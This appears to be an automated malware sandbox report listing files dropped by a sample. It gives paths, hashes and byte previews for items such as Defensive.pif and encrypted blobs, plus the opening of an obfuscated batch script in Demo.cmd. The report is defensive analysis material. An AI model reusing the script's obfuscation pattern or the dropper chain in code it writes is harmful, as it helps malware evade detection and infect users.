                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                • Filename: , Detection: malicious, Browse
                                                                                                • Filename: grd.ps1, Detection: malicious, Browse
                                                                                                • Filename: AssumedAlready.exe, Detection: malicious, Browse
                                                                                                • Filename: yhYrGCKq9s.exe, Detection: malicious, Browse
                                                                                                • Filename: nj230708full.pdf.scr.exe, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\DataSync Dynamics\P

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\88473\Defensive.pif
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):722674
                                                                                                Entropy (8bit):7.999782607299273
                                                                                                Encrypted:true
                                                                                                SSDEEP:12288:dQbCXDiYNZBtIH5bf9h3Vtr8121OSXynqPRgiUGQIoCE6KtwPED5aV:ab2iYNZYH53ZW4uPFaV
                                                                                                MD5:C07A747A9552773A0BDFF8375D948B57
                                                                                                SHA1:228D0F5DBDE64FC497174B1C176D4F0EC662B6A1
                                                                                                SHA-256:00123D49066976C9216B71F21F3C95741AA07106B2DC466F019B88B260ABCDCA
                                                                                                SHA-512:3B7E79C101B091A71773F92CDDD8FC974F6B3126B6F3AE0A97960C3F4172CAE8D0A5ECD5625710D23A2E20095113491D3DE8BC28CCBEC3F227C274F4EFFEBAB9
                                                                                                Malicious:false
                                                                                                Preview:...x......j"...]' Q.~64NfYs..t.....G....n..Y.^...d.e.x)..-....H.M...2..C..q...ySv.u[F.=.Y.........c...q~.....o..........F...3.........ce.S.I.... .......72....Y.q#7.= Z.>C.@H-%....o)......S...L..M....K.........y.......o..1..O,...'\##.i.Z..i...d.u...:E...gW.%F..Z....A..=...H.L....".%.WK..."..R:A...4..w...]b.....?.8.n7K.>*;z..b...pZV...6e.......i..Za...f.<.......g.M;.....Q.JE.o.........n.H..O..GL..;t.X.6.....sfa.Zm..u....SM^cD".[^T.=...v.I.B...t.b...U.....=k.s..{U/.M...`_..............9R.a6..<E...x....b+..N..wBi|Q.).=S....z.....Q..d.L.......0....%..."..,_..0o.s...`|....A...*Q,.!v.c..vDv.z....+.|V.&Z..b.......Qu.y.....=%.S-..S.....hR.a....\>..qR....D.^.....W!@...gw!.H....C|j.O..T.....!.....D;..8{...Y../..OS..._..urV..x.\.E.1.F%....g^.E...Z.m..1...K...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\88473\Defensive.pif
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):960
                                                                                                Entropy (8bit):5.009513037874596
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:tkhEVMnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkL:qhEV0dRNuKyGX85jvXhNlT3/73clHWro
                                                                                                MD5:845BF93A461E3922A20703B58F025E2B
                                                                                                SHA1:B661C50B0DA31F6B629A3C60179937D0D16A4D6F
                                                                                                SHA-256:BBEDBC1EA5791345D11505C28790FB99E4153EAB807BDE42DC5083B04816005B
                                                                                                SHA-512:2973021FE2F6912474E09C1FE95DE405C1E0191EB4B209D7813B3525B5DA67B1738F829A45E12C91C573D6687B2F44FE63DDA5C356BC4C8A7ECFB0A016C87D07
                                                                                                Malicious:false
                                                                                                Preview:{. "geoplugin_request":"216.52.183.148",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7157",. "geoplugin_longitude":"-74",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):960
                                                                                                Entropy (8bit):5.009513037874596
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:tkhEVMnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkL:qhEV0dRNuKyGX85jvXhNlT3/73clHWro
                                                                                                MD5:845BF93A461E3922A20703B58F025E2B
                                                                                                SHA1:B661C50B0DA31F6B629A3C60179937D0D16A4D6F
                                                                                                SHA-256:BBEDBC1EA5791345D11505C28790FB99E4153EAB807BDE42DC5083B04816005B
                                                                                                SHA-512:2973021FE2F6912474E09C1FE95DE405C1E0191EB4B209D7813B3525B5DA67B1738F829A45E12C91C573D6687B2F44FE63DDA5C356BC4C8A7ECFB0A016C87D07
                                                                                                Malicious:false
                                                                                                Preview:{. "geoplugin_request":"216.52.183.148",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7157",. "geoplugin_longitude":"-74",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                C:\Users\user\AppData\Local\Temp\88473\Defensive.pif

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:modified
                                                                                                Size (bytes):943784
                                                                                                Entropy (8bit):6.625461630496363
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                                                                                MD5:78BA0653A340BAC5FF152B21A83626CC
                                                                                                SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                                                                                SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                                                                                SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\88473\T

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):722674
                                                                                                Entropy (8bit):7.999782607299273
                                                                                                Encrypted:true
                                                                                                SSDEEP:12288:dQbCXDiYNZBtIH5bf9h3Vtr8121OSXynqPRgiUGQIoCE6KtwPED5aV:ab2iYNZYH53ZW4uPFaV
                                                                                                MD5:C07A747A9552773A0BDFF8375D948B57
                                                                                                SHA1:228D0F5DBDE64FC497174B1C176D4F0EC662B6A1
                                                                                                SHA-256:00123D49066976C9216B71F21F3C95741AA07106B2DC466F019B88B260ABCDCA
                                                                                                SHA-512:3B7E79C101B091A71773F92CDDD8FC974F6B3126B6F3AE0A97960C3F4172CAE8D0A5ECD5625710D23A2E20095113491D3DE8BC28CCBEC3F227C274F4EFFEBAB9
                                                                                                Malicious:false
                                                                                                Preview:...x......j"...]' Q.~64NfYs..t.....G....n..Y.^...d.e.x)..-....H.M...2..C..q...ySv.u[F.=.Y.........c...q~.....o..........F...3.........ce.S.I.... .......72....Y.q#7.= Z.>C.@H-%....o)......S...L..M....K.........y.......o..1..O,...'\##.i.Z..i...d.u...:E...gW.%F..Z....A..=...H.L....".%.WK..."..R:A...4..w...]b.....?.8.n7K.>*;z..b...pZV...6e.......i..Za...f.<.......g.M;.....Q.JE.o.........n.H..O..GL..;t.X.6.....sfa.Zm..u....SM^cD".[^T.=...v.I.B...t.b...U.....=k.s..{U/.M...`_..............9R.a6..<E...x....b+..N..wBi|Q.).=S....z.....Q..d.L.......0....%..."..,_..0o.s...`|....A...*Q,.!v.c..vDv.z....+.|V.&Z..b.......Qu.y.....=%.S-..S.....hR.a....\>..qR....D.^.....W!@...gw!.H....C|j.O..T.....!.....D;..8{...Y../..OS..._..urV..x.\.E.1.F%....g^.E...Z.m..1...K...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.

                                                                                                C:\Users\user\AppData\Local\Temp\Alice

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:PGP Secret Sub-key -
                                                                                                Category:dropped
                                                                                                Size (bytes):52224
                                                                                                Entropy (8bit):7.996277673397928
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:aDKH3EgTrpkQez7S9HRACcXIlGjeaNN56sZI6cgsptGqnPSvGgqjsFuBviMywW:auHJ5ez29xvc4lGjea5I6x6GLGg4z30
                                                                                                MD5:52843C2DF6D700E0ABA1D0DF9F202FB9
                                                                                                SHA1:A27E94DFD46B2F549AD3CD7197412EA927DD7EC5
                                                                                                SHA-256:4C647629A430738DE5EA001349AE0BEF7959D1092C15B817986E434511E861E5
                                                                                                SHA-512:921E39E597A696752C8F05C3FC0D77D45B3112FE0D17423B2A38FBBB9679EB9E1AC57984D0FD29F83899F72FAD709782411A753B14C881B72C1DF2957BFE407A
                                                                                                Malicious:false
                                                                                                Preview:...>ZN..)[k...4..I..+.(A.......y.o..aZ.h.#ZR.2W.H^....?......:..]..|_..hD..HU6...R...c+U[..T.q....C...+...+1..Y.....Ta2w.!....8i~Fo..i.. ...Z.....#z.Ux...P..tp[~t..t/..l........4I..8....z.s.i`..8.36..J.r:..0..B..m.4..i......... ....=Y6....<........%.|Q..|<..#..".$Jn.=..|/.U.........W......ud.p}...Kp.C..P(.......NQB..8.oR....QiW...}..8....l.......B.../4.a.......h..Nk..],}.....J..-.7.1...x.!..8..>..N........A..*.......[..[...D8..\..fo.....@d.OeX.:.x%=.,.e...<...H(.....]..c.X_u.e]Y...Y..i.W$.....8..d...."o.&...NPv./"...\.l.Fi.Rj.../2##..s[..}.E...s...zv..T.@....V.SI .]..u........B../..S...>...IF..}Y...D......E.3..I.D`..Aex..j.S`........:...Yi.9.1....O19QvT...=s..v%D.DI..,pI9m.([.b.g....&.\.K..>.G....[A@g..?.@....<s^.\.*.Q..:.J..#.VX...-$\.].J..!..-.Yo..j....sb.c.....]CK.6B0/...%._K.."}....3....'........9..)a`Z..QG|?&."..O..&.q] K1....@.4..2L.B.,UL.vU.62:.L.).B../.<8.P.TX..N>.D/...X7.W5..(^..3.Z.c.0S.f....hm4.:...$...S.ak6.(..n.Cv..XG.;..~.Eq@..Aw.-.k.

                                                                                                C:\Users\user\AppData\Local\Temp\Bulgaria

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):924635
                                                                                                Entropy (8bit):6.626202852572568
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:9Js7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:9C7hGOSPT/PxebaiO
                                                                                                MD5:944015392B1EF8EA2364F1D913A8D367
                                                                                                SHA1:95316236E809A9359A706039204023BB2597F393
                                                                                                SHA-256:7C0923D0ED5C9E3001A50AF389917FB68668A7623D38F24D0B1971A8356B7CF5
                                                                                                SHA-512:636900C5965A2CF9AD1B20015781291E6B2A6BE6AD0E365B265D7BAE169071CC3190996AA0C1EBF523A5DF70C8DE13294CA16152370455CD8708E4C6238FBFD4
                                                                                                Malicious:false
                                                                                                Preview:F.....`....E.P.....M..8....M..0..._^[....I.A.G.....U..QQV..i......d...uS.p..7....M..E.....Q.M.QP...d....x$.}....`...t...i......d...u..I..E.A..^......j....@0.I0..U..SV.u.3.W....y.Q.>.......t....%M..@...f9X.u..8!t....t._^3.[].......U....3.BSVW..P.P..U................J....%M..O..1f.~..u.6.. t...+u..+...3...+.............f.y.4............A....E.A..E..A...R.U.E.....h...X%M..)6......M....G.3..+....D..f.x.GuB.A..E..E.SP.E.P.E.PW.}.......(....M......U..%....X%M.....3._^[..jiX.....U...<SV.M..M.W.(....}.3..E........7N.u..u.3...R.B...._.....t&..u".@...f9p.u......tB...u..u6..U...M..E.P..`....F....E..M.@....}...M...}.._^[....I.A.U..E.;..3M.....~.......3M.]...3...U..W........Q...Vj8.f...Y.u...........O..N0.w.^.._]...U..V.u.W.......O..F..G..F..G..F..G..F..a..P.M....F .O .a..P.=....._^]...3.3.@.Q..A..Q..A,...Q .Q(.U..W......uCVj(....Y.....^6...u....0.......5...v..6....I..f$..G...t..p$.w..G.^_]....7..U..VW.}...;.t.W.B6...G..F..G..F..G..F..G..F..G .F .._^]...SW..._...t.V.3

                                                                                                C:\Users\user\AppData\Local\Temp\Classics

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):19185
                                                                                                Entropy (8bit):6.419964266746851
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:glFuOqohnWzR7NNilkEdpMMKAdbLPlUccucHU0f//+ddNEqCt7E3C:cFxfhnWz8kETRZbRUccWk+3+e3C
                                                                                                MD5:6EEE642C2A3A260E5B43D2A8FCC02ABA
                                                                                                SHA1:5CFDF735055BFC8C277CF17FA093FB4D405CC13A
                                                                                                SHA-256:861FDB83E5ED3364BADBCE2C7BFEF06539B33B06322D5173CCACF7499AF0277C
                                                                                                SHA-512:A8FDA3E8CC7ABC9655DD78B1A77B9F01357020C1D8C16722C2AA7BC4DFDA3281150C164944F5B1EC5DD351F2060AB99C307D8D7FA0068BD473CCE8E6AF2142AE
                                                                                                Malicious:false
                                                                                                Preview:partitionhansenincorporatemichigan..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B............................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\Customize

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):70656
                                                                                                Entropy (8bit):7.9973143323782585
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:2ifoVDMprZ/lQ+Kbt6C/wql27vrQVWGnkfYgC9MFmCwsIKNXidpey6Wh:sDMn/S+8p/wm2YVWakVCiFmCwINXweBW
                                                                                                MD5:0A4DC3CA733D59E7496DB826225B536E
                                                                                                SHA1:C32BE7D49F3F3304D85BBBBC5B9F80569DC47B6B
                                                                                                SHA-256:94B64A54B5CA33595336AB26E7F9EF202BAD80DD032ADBCAB1CDD9A61FDB77F0
                                                                                                SHA-512:B57588F88AA5C03FC9F9410EF1B48F2ED48B5348F2F4FB51E8FEA140E510DDD5BCFC357174F6C4BFE5E263277717BB0E6F68F60C8693FC6E90616F5412B07046
                                                                                                Malicious:false
                                                                                                Preview:..6.=i.....a...H.q.]...ZF<.....q.M.` @U.k@.o...q?......Cm........DD...)...%.c...T...2T0-\N]@/....o.......2.....+.....N.$.~.....t4`:.?..ZM..7.......-......t...E..x.+..(..?.{.g.F...;..y..U....T..X.^.0.K..TbILv.........#.9..3..<..SCh0'..c.9.[....`.<.rU?..m.O.m.b>.+j..o.`c....xt9....,.......3m..]a6...%....[......X........+...&d.8......t....`...E^#/."...2mX,-...=.)...b!.2..%].v.h..'...?.i....."6[....6....h.Ja..1...wz.>Ia......=.....~..I~C.C-......$..XT...b.<.....n.;.g0.<iYI+.E...b.yH.!.mD@...>..#...x..&..p./9t.6a.W...]......}.\ZQ..[.S{F+... r.9.-~&..o..x%..O..Wz..m..w.....t-...;...*Z.......w+m........QP.X_.Q.4S..%E.0..vw:.{.t1z..<.'..,.......ec.+.^..f..k.g1Q.....6........,.S...p.B..}V.Z...}..$-.......;.t4......)I.5%...K..C.....o..9..L.@.1.G..H_j@.H...V.....t.v........f...R..>.A...)[.B ....d.Z...Y.P.5...u9nN..6.....Y.zX...SFAh...Zh..*....j.L.;%..q.$....k...z.1.JV..X....6....K....m....2.;..<.q..)H.T.I...&=.....wV.Y...VwJ...'...8....x

                                                                                                C:\Users\user\AppData\Local\Temp\Damn

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:OpenPGP Public Key
                                                                                                Category:dropped
                                                                                                Size (bytes):88064
                                                                                                Entropy (8bit):7.9979035321801915
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:f8Ba9Dk1k3LMiZBm5INvavBOqBjnDvDIH/NYVF4V1dcGwBW0F4WLoOLr91:JAgMAm5dvBOqVhF4VKF4jOLp1
                                                                                                MD5:64639F96913FF071951CAB604E88E681
                                                                                                SHA1:9B6939623303D88974E05279BCE0797A7931B58B
                                                                                                SHA-256:D311891A25EE2B52B14475B774D42313965FC112B81FD3B85D9A38C9D9368B8C
                                                                                                SHA-512:192ACB4C34353BAAE70BA5681E0A1C7517ED0C36A52231A16478E3249E34AC9F064ADA34C8EE3CE6F818330BF134867FB5C0A048745218702D783C266E62A63F
                                                                                                Malicious:false
                                                                                                Preview:..<...7m&..[...K..]nJM+"...c..\..5...X.j......pi..`....!.l..........Au........$.O.Y$....{ ..!..GS....\...b..6.M:..^...l..........zR)&@.....G'ff.l.4..B.#.s.:yp..5...I..U....+..|..~..c8.eu*".7*.O..D...Z........w.CQ.".Y.M.=.................]..!I../..F.....E8..#.`.:8..8(.Y...w-.A.D.e$.R....e..KR.8....%..o.5\......3......*[....D.....9.V....l.......H....n4]..(&x.*..1.."(..>.$.:..C.%......._......O...b.v>.+..i....\$.....F..Wr./R......./.......&.n_..S.O[....:X.......AR/..n..)..Y.F.......x)..u......q.r...R..-1..a....D.v.C...~..OV.{oo=J8...gd.2.H.%o>.....Yj&/..w.\...s.5$...u.....<k.....Y..eS.$8...kV.V2F.x....e|....g.h.IX5..ku.....{..".....f.M.$...f......./..w9..6o...3.T."f.....K%.\.4ba..Z......h..R.1...N0K.8..8tu...RD_w...8.b......6y.........|...{../....O.]*.g!.4.~.xL.0.O.n.#..*.A.C.`.AuG...e.7w.;.S..3yO.p9f.;2#n....a..[.K......S..k..5d$t......H?...!....X.D..4.u.f.........7....x..Z....`...q.N;L...@Y..H)..,..g.!......^@...G.(..).'.W1....<

                                                                                                C:\Users\user\AppData\Local\Temp\Demo

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:ASCII text, with very long lines (462), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8027
                                                                                                Entropy (8bit):5.164551350073997
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:WZel4Eb4aQ0nj7UaTt5Z6CmZ1hR+MonfKPGliFTOZn:VXMadj7vtTqMJ
                                                                                                MD5:595A2FEFA8BF265AD9F21EC518957C65
                                                                                                SHA1:A2F91C896BD2FADBB240AA1F72AE2543C5BC3444
                                                                                                SHA-256:2B9D14702F75F3712A4224C45AE3356DFCA5C6814B7963B45D3FD0153F82535A
                                                                                                SHA-512:49F0AF57F7665AD80A1BBAC54BBC84A274FCE94D0847181E1E19B348A0A09D5FD2147AC725395F4FC039FFA1C6C05A3B29140FAB7950172B3AFE6DC3EEF75279
                                                                                                Malicious:false
                                                                                                Preview:Set Queensland=J..sQSilent-Respective-Citation-Spread-Newcastle-India-Jelsoft-R-..TFeMName-Fisting-Players-Dept-Critics-Financial-Coming-Authorized-Services-..MhaBrakes-Functionality-Damn-Load-..AaSrEden-Asp-Clause-..NhStudy-..jOBiBreasts-Issued-Particles-Replica-Very-Maps-Bigger-Fight-..tFPd-Bahrain-Asn-Daddy-Motorcycle-Reader-..vXCommission-Belongs-..BEMother-Camp-Newbie-Momentum-Craps-Hierarchy-Hc-Lets-..Set Stop=K..VnWed-Cookbook-Filing-Statistical-Dept-Hat-Each-Zone-Gone-..duActing-Bank-Male-..xJUEbook-..ZwyzIso-Auctions-Teachers-Active-Downtown-..oUJoins-Most-..PuLeasing-..uDtiAccused-Switched-Db-Mobility-Usb-Prediction-..aQAmazoncouk-Relief-..Set Protect=l..NWuhNeighbors-Evaluated-Iceland-Dust-Survivor-Wisdom-..UtHanded-Cart-Jennifer-Klein-Smoking-Sole-Completely-..rzuAppear-Myself-..dYBBecame-Cited-Settled-Pas-Sticks-Laser-Dated-Spots-..MyRElements-Basics-Asset-F-..xoMorgan-Gods-Appraisal-Threshold-Ja-Ghz-Document-Stats-..CwBeLiable-..mGZWorking-Posters-Simplified-Vocal-Luis-Rj

                                                                                                C:\Users\user\AppData\Local\Temp\Demo.cmd

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                File Type:ASCII text, with very long lines (462), with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8027
                                                                                                Entropy (8bit):5.164551350073997
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:WZel4Eb4aQ0nj7UaTt5Z6CmZ1hR+MonfKPGliFTOZn:VXMadj7vtTqMJ
                                                                                                MD5:595A2FEFA8BF265AD9F21EC518957C65
                                                                                                SHA1:A2F91C896BD2FADBB240AA1F72AE2543C5BC3444
                                                                                                SHA-256:2B9D14702F75F3712A4224C45AE3356DFCA5C6814B7963B45D3FD0153F82535A
                                                                                                SHA-512:49F0AF57F7665AD80A1BBAC54BBC84A274FCE94D0847181E1E19B348A0A09D5FD2147AC725395F4FC039FFA1C6C05A3B29140FAB7950172B3AFE6DC3EEF75279
                                                                                                Malicious:false
                                                                                                Preview:Set Queensland=J..sQSilent-Respective-Citation-Spread-Newcastle-India-Jelsoft-R-..TFeMName-Fisting-Players-Dept-Critics-Financial-Coming-Authorized-Services-..MhaBrakes-Functionality-Damn-Load-..AaSrEden-Asp-Clause-..NhStudy-..jOBiBreasts-Issued-Particles-Replica-Very-Maps-Bigger-Fight-..tFPd-Bahrain-Asn-Daddy-Motorcycle-Reader-..vXCommission-Belongs-..BEMother-Camp-Newbie-Momentum-Craps-Hierarchy-Hc-Lets-..Set Stop=K..VnWed-Cookbook-Filing-Statistical-Dept-Hat-Each-Zone-Gone-..duActing-Bank-Male-..xJUEbook-..ZwyzIso-Auctions-Teachers-Active-Downtown-..oUJoins-Most-..PuLeasing-..uDtiAccused-Switched-Db-Mobility-Usb-Prediction-..aQAmazoncouk-Relief-..Set Protect=l..NWuhNeighbors-Evaluated-Iceland-Dust-Survivor-Wisdom-..UtHanded-Cart-Jennifer-Klein-Smoking-Sole-Completely-..rzuAppear-Myself-..dYBBecame-Cited-Settled-Pas-Sticks-Laser-Dated-Spots-..MyRElements-Basics-Asset-F-..xoMorgan-Gods-Appraisal-Threshold-Ja-Ghz-Document-Stats-..CwBeLiable-..mGZWorking-Posters-Simplified-Vocal-Luis-Rj

                                                                                                C:\Users\user\AppData\Local\Temp\Directories

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):68608
                                                                                                Entropy (8bit):7.997372587882139
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:CQoBFXk5dtA09+cqajF6mIKZUfXui90gCGKdcRw6wj:xo3MzA8qajF6mTSXB90gsd2w/j
                                                                                                MD5:AC59C10A1EA58112F67D9199BCEFFCC6
                                                                                                SHA1:2BD97CD63741AE92EE14C58F2DE8AEF371345076
                                                                                                SHA-256:7DB329A128907CC4FAE0136382E6565B4B93AF333464A26B73A73CE14BB0AFA4
                                                                                                SHA-512:CD99A3B217EE6C752184D81B7CEE377746E0CD7476BC5E300BBEACA1552D02CC8D07B802001332F465F4E2E32934C844E31660D9BC77D54BA6F76DCEDFDA51D4
                                                                                                Malicious:false
                                                                                                Preview:).O.j..B.Q."/.+no&.t.D.c..k..N..Q..C.x../....3..M,.....n.H7.1.0.>.se...3......R.-.(.......O..T.D...YB...A..;..k."..T.y.........I.....7.S.,.(H...]......$.\......;..T.^.M.....O...K'xJ.9Cr....$.l...W.}.S.hCP-.e!.........Je....O.)B.W.}..|..[.9.47 .n........p%[.mS<...:....Q........}....P..V...g........V..,..)."3m...4/].V>...4p}$...._.R..Z...E...|....P.T.........Q.h|/...}.^h';....e.*....jS...8....5..A...G.....H.........G.......(.>...~(.5,*\c...V)...Z.,..M$...=....t...5`SYX.;....z.ST...Z...@...i..,.*NO...R1Y}.R..,.^k.f.3.6w+..V~yd..>...g7.D..X..{.a.OI.R..6.j.......X.K.t..\..0.G....>..X@....F../>O.....>.1...`.K3.........n....M....6..6}......s.......M1.(..].f}f.w.f...M.8z.......C.n...'.l.(..#P....j.I..k:.....lZ.T...!T.m.0...d....>...#)I.b..X.....<....`e.w?.%...Hmnjz.8..W.S..&`k.H.x.T..........6.=..J]..T..>.~."......b..&...c."......L..[....&?I.........!'....?m.".[.....d........Vn.kv.a.TR..r3..).,..6.......d<..|...-.z........".....>.)h.

                                                                                                C:\Users\user\AppData\Local\Temp\Downloadcom

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):84992
                                                                                                Entropy (8bit):7.99764709220155
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:1U1cos7rV0Ug6d3fEtuzQMxSBjnMzgMTdbIZXMEChA3/whGx4DM512Xq4jH:e1Qo6d3fEtujAOgM5IZchAPwhPY5MXqo
                                                                                                MD5:4866B5D6AC3D74C8EEBC7C6FF7C26A03
                                                                                                SHA1:CE12149D7709FD0034413CD4C98D11E682734996
                                                                                                SHA-256:D7CB3ED23589AA6D4DFCF7379D3FB72B338AB1B27C18A1A80851A4E8EB61B8B8
                                                                                                SHA-512:6D1E85D8E200D35F597D0640C00C9A5FBED34E755ECCBC78DCE928C0B356A9EAEEC16B8F40172408F539ADF5DBF9DC542B1B48D5BBC9FEB6EDBE10F8DD26E6C8
                                                                                                Malicious:false
